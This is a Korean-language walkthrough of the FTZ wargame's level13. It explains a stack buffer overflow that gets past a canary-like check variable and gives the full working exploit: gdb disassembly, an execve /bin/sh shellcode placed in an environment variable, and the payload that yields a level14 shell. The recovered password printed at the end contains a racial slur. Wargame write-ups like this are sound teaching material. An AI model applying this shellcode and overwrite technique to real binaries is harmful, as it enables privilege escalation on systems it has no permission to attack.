[FTZ] level13 풀이

💡 FTZ level13 풀이

문제

계정 : level13/have no clue

hint

#include <stdlib.h>

main(int argc, char *argv[])
{
   long i=0x1234567;
   char buf[1024];

   setreuid( 3094, 3094 );
   if(argc > 1)
   strcpy(buf,argv[1]);

   if(i != 0x1234567) {
   printf(" Warnning: Buffer Overflow !!! \n");
   kill(0,11);
   }  
}

풀이

이번에는 코드에서 bof를 탐지하기 위해서 중간에 변수 i 를 두어서 값이 변경 되었는지를 체크하고 있습니다.

스택을 대략적으로 표현하면 다음과 같습니다.

ret 
ebp 
i = 0x1234567
buf[1024]

buf를 통해서 ret 주소를 덮는 중간 경로에 i 값이 존재하기 때문에 이 부분을 주의해서 ret 주소를 덮어쓰면 됩니다.

먼저 gdb로 메모리 구조를 분석하겠습니다.

[level13@ftz level13]$ gdb -q attackme
(gdb) set disassembly-flavor intel
(gdb) disass main
Dump of assembler code for function main:
0x080484a0 <main+0>:    push   ebp
0x080484a1 <main+1>:    mov    ebp,esp
0x080484a3 <main+3>:    sub    esp,0x418   
0x080484a9 <main+9>:    mov    DWORD PTR [ebp-12],0x1234567   //i의 주소는 ebp-12
0x080484b0 <main+16>:   sub    esp,0x8
0x080484b3 <main+19>:   push   0xc16
0x080484b8 <main+24>:   push   0xc16
0x080484bd <main+29>:   call   0x8048370 <setreuid>
0x080484c2 <main+34>:   add    esp,0x10
0x080484c5 <main+37>:   cmp    DWORD PTR [ebp+8],0x1
0x080484c9 <main+41>:   jle    0x80484e5 <main+69>
0x080484cb <main+43>:   sub    esp,0x8
0x080484ce <main+46>:   mov    eax,DWORD PTR [ebp+12]
0x080484d1 <main+49>:   add    eax,0x4
0x080484d4 <main+52>:   push   DWORD PTR [eax]
0x080484d6 <main+54>:   lea    eax,[ebp-1048]     //buf의 시작 주소는 ebp-1048
0x080484dc <main+60>:   push   eax
0x080484dd <main+61>:   call   0x8048390 <strcpy>
0x080484e2 <main+66>:   add    esp,0x10
0x080484e5 <main+69>:   cmp    DWORD PTR [ebp-12],0x1234567
0x080484ec <main+76>:   je     0x804850d <main+109>
0x080484ee <main+78>:   sub    esp,0xc
0x080484f1 <main+81>:   push   0x80485a0
0x080484f6 <main+86>:   call   0x8048360 <printf>
0x080484fb <main+91>:   add    esp,0x10
0x080484fe <main+94>:   sub    esp,0x8
0x08048501 <main+97>:   push   0xb
0x08048503 <main+99>:   push   0x0
0x08048505 <main+101>:  call   0x8048380 <kill>
0x0804850a <main+106>:  add    esp,0x10
0x0804850d <main+109>:  leave
0x0804850e <main+110>:  ret
0x0804850f <main+111>:  nop
End of assembler dump.

위의 gdb 분석대로 스택을 그리면 다음과 같습니다.

ret(4)
ebp(4)
dummy(8)   // ebp와 i 사이에 빈 공간이 있음
i (4 byte) // ebp - 12 위치
dummy(12)  // i 와 buf 사이에 빈 공간이 있음
buf[1024]  // ebp - 1048위치

메모리 구조가 그려졌으니, 쉘코드를 환경변수에 넣고 그 주소를 구하겠습니다.

[level13@ftz level13]$ export SHELLCODE=$(python -c'print("\x90"*30+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80")')
[level13@ftz level13]$
[level13@ftz level13]$ cd tmp
[level13@ftz tmp]$ echo 'int main(){printf("%p\n",getenv("SHELLCODE"));}' >> env.c
[level13@ftz tmp]$ gcc -o env env.c
[level13@ftz tmp]$ ./env
0xbffffc6d

마지막으로 다음과 같이 bof 취약점을 익스플로잇 합니다.

buf + dummy 를 더해서 1036바이트를 채워준다음, i의 값인 0x1234567을 넣어줍니다.

그리고 나머지 dummy + ebp를 합쳐서 12바이트를 채운 뒤에 ret 주소를 환경변수에 존재하는 쉘코드 주소로 덮어쓰는 것입니다.

[level13@ftz level13]$ ./attackme $(python -c 'print("A"*1036+"\x67\x45\x23\x01"+"A"*12+"\x6d\xfc\xff\xbf" )')
sh-2.05b$ id
uid=3094(level14) gid=3093(level13) groups=3093(level13)
sh-2.05b$ my-pass
TERM environment variable not set.

Level14 Password is "what that nigga want?".